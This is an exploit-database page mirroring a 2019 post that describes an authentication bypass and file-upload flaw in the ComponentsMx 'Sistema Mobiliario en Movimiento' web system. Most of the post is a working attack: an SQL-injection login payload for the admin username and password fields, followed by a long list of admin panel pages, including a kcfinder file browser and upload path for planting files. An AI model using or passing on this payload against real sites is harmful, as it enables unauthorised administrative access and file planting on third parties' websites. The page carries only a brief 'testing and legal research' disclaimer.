Advertisement






Sistema Mobiliario en Movimiento ComponentsMx Authentication Bypass Insert File Vulnerability

CVE Category Price Severity
N/A CWE-287 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2019-08-19
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019080077

Below is a copy:

Sistema Mobiliario en Movimiento ComponentsMx Authentication Bypass Insert File Vulnerability
####################################################################

# Exploit Title : Sistema Mobiliario en Movimiento ComponentsMx Authentication Bypass Insert File Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/08/2019
# Vendor Homepage : components.com.mx
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-287 [ Improper Authentication ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
Authentication is any process by which a system verifies the identity of a user who wishes 
to access it.When an actor claims to have a given identity, the software does not 
prove or insufficiently proves that the claim is correct and besides it allows 
upload a file on the system without administrator permission. Improper authentication 
occurs when an application improperly verifies the identity of a user. 
A software incorrectly validates user's login information and as a result, an attacker can 
gain certain privileges within the application or disclose sensitive information that allows 
them to access sensitive data and provoke arbitrary code execution.
The weakness is introduced during Architecture and Design, Implementation stages.

####################################################################

# Authentication Bypass / Admin Panel Login Bypass Exploit :
******************************************************
/admin/index.php
Admin Username : '=''or'
Admin Password : '=''or'
/admin/home.php
/admin/modificar.php
/admin/archivo_nuevo.php
/admin/archivos.php
/admin/editor_nuevo.php
/admin/Logo.php
/admin/imagenfavi.php
/admin/pestana.php?seccion=Pestana
/admin/banner.php
/admin/banner2.php
/admin/op.php?seccion=Conoce
/admin/opim.php?seccion=Llamanos
/admin/opim.php?seccion=Servicios
/admin/opim.php?seccion=Ingenieria
/admin/opim.php?seccion=Infraestructura
/admin/op.php?seccion=Alcantarillado
/admin/op.php?seccion=Cert2
/admin/opdes.php?menu=inicio.php&seccion=Cert
/admin/catalogo_nuevo.php
/admin/catalogo2.php
/admin/opdes.php?menu=inicio.php&seccion=ahora
/admin/opti.php?seccion=Aviso%20de%20Privacidad
/admin/opti.php?seccion=Encabezado
/admin/opti.php?seccion=Pie%20de%20Pagina
/admin/Nosotros.php
/admin/nos_editar.php?seccion=Nosotros
/admin/banner_nuevo_nosotros.php
/admin/banner_nosotros.php
/admin/opdes.php?menu=Nosotros.php&seccion=Mision
/admin/opdes.php?menu=Nosotros.php&seccion=Vision
/admin/opdes.php?menu=Nosotros.php&seccion=Valores
/admin/productos.php
/admin/opt.php?seccion=TituloProductos
/admin/ct.php
/admin/cat.php
/admin/producto_nuevo.php
/admin/productos1.php
/admin/producto2_nuevo.php
/admin/productos1gal.php
/admin/promociones.php
/admin/contacto.php
/admin/contactoE.php?seccion=Contacto
/admin/Correo.php?seccion=Correo
/admin/kcfinder/browse.php
/admin/kcfinder/upload/files/[yourfilename].html

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum